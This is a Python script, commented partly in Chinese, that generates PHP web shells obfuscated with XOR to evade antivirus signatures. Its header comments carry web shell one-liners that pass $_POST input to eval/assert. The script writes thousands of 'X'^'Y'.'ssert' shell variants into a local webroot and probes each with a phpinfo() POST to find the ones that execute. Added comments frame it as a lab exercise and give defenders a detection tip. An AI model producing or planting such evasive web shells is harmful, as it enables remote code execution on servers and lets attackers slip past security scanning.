php异或免杀

import requests,base64,time,sys,threading,queue
#异或免杀
#<?php $a=("!"^"@").'ssert';$a($_POST['hacker']);?>
#<?php @eval($_POST['hacker']);?>
#'!' (0x21 / 33) 和 '@' (0x40 / 64) 先各自转为 ASCII 码，再按位异或：33 ^ 64 = 97，即字符 'a'，拼上 'ssert' 得到 assert，文件里因此不出现 assert 字面量

#string 检测phpinfo是否执行成功
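def string(marker='bingtang-PC'):
    """Worker: drain the module-level queue ``q`` and check each generated file.

    For every filename taken from ``q`` the lab server at
    ``http://127.0.0.1:8080/x/<filename>`` is POSTed ``x=phpinfo();``; if
    ``marker`` occurs in the response the file executed code and
    ``check-><name>->ok`` is printed, otherwise ``check-><name>->no``.

    Args:
        marker: substring that proves phpinfo() ran. The default is the
            original author's lab hostname as printed by phpinfo(); set it
            to your own host's name (or any other phpinfo()-only string).

    Reads: ``q`` (a ``queue.Queue`` of filenames) created in ``__main__``.
    Intended to run as the target of several ``threading.Thread``s.
    """
    # The original if/else had mismatched indentation (an IndentationError at
    # import time); the branches are aligned below.
    while True:
        # empty()-then-get() races between workers; get_nowait() turns the
        # "queue drained" condition into an explicit exit instead of a hang.
        try:
            filename = q.get_nowait()
        except queue.Empty:
            return
        url = 'http://127.0.0.1:8080/x/' + filename
        datas = {
            'x': 'phpinfo();'
        }
        try:
            # timeout: a stalled lab server must not block the worker forever.
            response = requests.post(url, data=datas, timeout=10)
        except requests.RequestException as exc:
            print('check->' + filename + '->error ' + str(exc))
            continue
        # errors='replace': phpinfo() output may contain non-UTF-8 bytes.
        result = response.content.decode('utf-8', errors='replace')
        if marker in result:
            print('check->' + filename + '->ok')
        else:
            print('check->' + filename + '->no')
        time.sleep(1)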

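def shell_test_check(filename='33xd64.php', marker='bingtang-PC'):
    """Manually check a single generated file on the local lab server.

    The default file is the ``'!'^'@'`` variant from the header comment
    (33 == ord('!'), 64 == ord('@'), 33 ^ 64 == ord('a')). The server is
    POSTed ``x=phpinfo();``, the raw response is printed, and ``ok`` is
    printed only when ``marker`` appears in it (nothing is printed on a miss,
    as in the original).

    Args:
        filename: name of the file under ``/x/`` to test.
        marker: substring that proves phpinfo() ran (the original author's
            lab hostname by default).
    """
    url = 'http://127.0.0.1:8080/x/' + filename
    datas = {
        'x': 'phpinfo();'
    }
    # timeout so a hung server cannot hang the checker; errors='replace'
    # because phpinfo() output is not guaranteed to be valid UTF-8.
    result = requests.post(url, data=datas, timeout=10).content.decode('utf-8', errors='replace')
    print(result)
    if marker in result:
        print('ok')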

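if __name__ == "__main__":
    # Generates one PHP file per (i, ii) pair in 1..126 into the local phpstudy
    # webroot, then has 10 worker threads POST phpinfo() to each one.
    #
    # NOTE(review): this writes ~15k files into a webroot and only makes sense
    # against a disposable lab host you own (127.0.0.1 here). Only pairs with
    # i ^ ii == ord('a') (97) actually build the string 'assert'; every other
    # file is a no-op, which is what the checker sorts out. assert() stopped
    # evaluating string arguments in PHP 8.0, so a hit requires a PHP 5/7
    # target. For defenders: a signature on the literal 'assert' misses all of
    # these files; the invariant worth detecting is a request parameter
    # ($_POST[...]) reaching a variable function call ($a(...)), however the
    # name is assembled.
    out_dir = 'D:/phpstudy/WWW/x/'
    q = queue.Queue()  # FIFO of generated filenames, drained by string() workers
    # A bare "'" terminates a PHP single-quoted literal and "\" starts an
    # escape, so 'X'^'Y' built from either would not parse; skip them.
    unquotable = {ord("'"), ord('\\')}
    for i in range(1, 127):       # ASCII 1..126 (range() excludes 127)
        for ii in range(1, 127):
            if i in unquotable or ii in unquotable:
                continue
            payload = "'" + chr(i) + "'" + '^' + "'" + chr(ii) + "'"
            code = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>"
            filename = str(i) + 'xd' + str(ii) + '.php'
            q.put(filename)
            # 'w' rather than 'a': re-running appended a second copy of the
            # code and broke every file. The with-block closes the file.
            with open(out_dir + filename, 'w') as f:
                f.write(code)
            print(filename + '文件生成成功')
    # Start the workers and wait for them so the process exits only once every
    # queued file has been checked.
    workers = [threading.Thread(target=string) for _ in range(10)]
    for t in workers:
        t.start()
    for t in workers:
        t.join()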

 
